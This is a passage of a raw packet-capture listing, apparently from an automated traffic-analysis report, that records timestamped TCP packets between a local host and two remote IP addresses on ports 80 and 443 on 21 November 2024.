                                                                                                                                                                                                            Nov 21, 2024 15:17:36.245146036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.245275974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.245316029 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.245861053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.245984077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.246041059 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.246666908 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.246864080 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.247103930 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.247333050 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.247454882 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.247503996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248065948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248266935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248442888 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248795033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248902082 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.248939991 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.249557972 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.249639034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.249675035 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.250294924 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.250411987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.250447989 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.250981092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.251055956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.251094103 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.251662016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.255515099 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.294308901 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.294378996 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.294640064 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.294987917 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.294987917 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.295006037 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.295015097 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.301418066 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.301476002 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.301574945 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.307940960 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.307954073 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.386204004 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.424817085 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.424865961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.424905062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.424937010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.425080061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.425218105 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426079988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426091909 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426105022 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426145077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426172018 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426316977 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.426819086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.427186012 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.427361012 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.427602053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.427763939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.428755999 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431284904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431598902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431612015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431623936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431649923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431685925 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431739092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431751013 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431762934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431777000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431799889 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.431843042 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.432372093 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.432543039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.432622910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.433132887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.433296919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.433337927 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.433830023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.433994055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.434036970 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.434533119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.434695959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.434740067 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.435333967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.435345888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.435396910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.435937881 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.436105013 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.436146021 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.436687946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.436855078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.436923027 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.437608957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.437628984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.437763929 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.437958002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.437978983 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.438013077 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.438905954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.439066887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.439203024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.439553022 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.439718962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.439898014 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.440299988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.440470934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.440552950 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441097021 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441118002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441169024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441735029 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441880941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.441941977 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.442514896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.442666054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.442728043 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.443236113 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.443412066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.443897009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444013119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444194078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444669962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444827080 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444832087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.444958925 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.445343018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.445538044 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.445712090 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.445979118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.446185112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.446666002 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.446897984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.447048903 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.447101116 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.447500944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.447801113 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.447849989 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.448282957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.448317051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.448364973 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.449059963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.449198008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.449315071 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.449798107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.449965000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.450005054 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.450489998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.450628042 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.450671911 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.451348066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.451502085 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.451570988 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.451906919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.452066898 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.452109098 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.452652931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.452816963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.452857971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.453484058 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.453495979 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.453555107 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.454112053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.454370975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.454412937 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.454952955 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.455096960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.455209970 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.455709934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.455720901 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.455770016 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.456327915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.456485033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.456556082 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.456932068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.457088947 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.457371950 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.457855940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.458015919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.458095074 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.458462000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.458622932 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.458669901 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.459204912 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.459367037 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.459418058 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.459995031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.460144043 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.460195065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.460747957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.460760117 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.460851908 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.461338997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.461673975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.461724043 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.462135077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.462300062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.462388039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.462922096 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.463093996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.463334084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.463547945 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.515163898 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.634705067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.634912014 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.634965897 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.634994030 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.635194063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.635241032 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.635271072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.635600090 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.635695934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.636023998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.636287928 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.636357069 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.636394024 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.637005091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.637129068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.637152910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.637989998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.638005018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.638076067 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.638515949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.638601065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.638639927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.639206886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.639297009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.639394999 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.639945030 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.640055895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.640079021 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.640652895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.640748978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.641051054 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.641377926 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.641433954 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.641479969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.642117023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.642209053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.642222881 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.642848015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.642961979 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.643053055 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.643588066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.643697023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.644303083 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.644397020 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.644426107 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645034075 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645097017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645199060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645754099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645858049 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.645956039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.646456957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.646581888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.646585941 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.647196054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.647298098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.647322893 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.647929907 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.648045063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.648092985 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.648695946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.648852110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.648874998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.649385929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.649461031 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.649477005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650121927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650190115 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650222063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650871992 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650929928 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.650932074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.651576996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.651762962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.651964903 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.652303934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.652417898 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.652461052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.653036118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:36.653134108 CET8049778185.215.113.16192.168.2.6
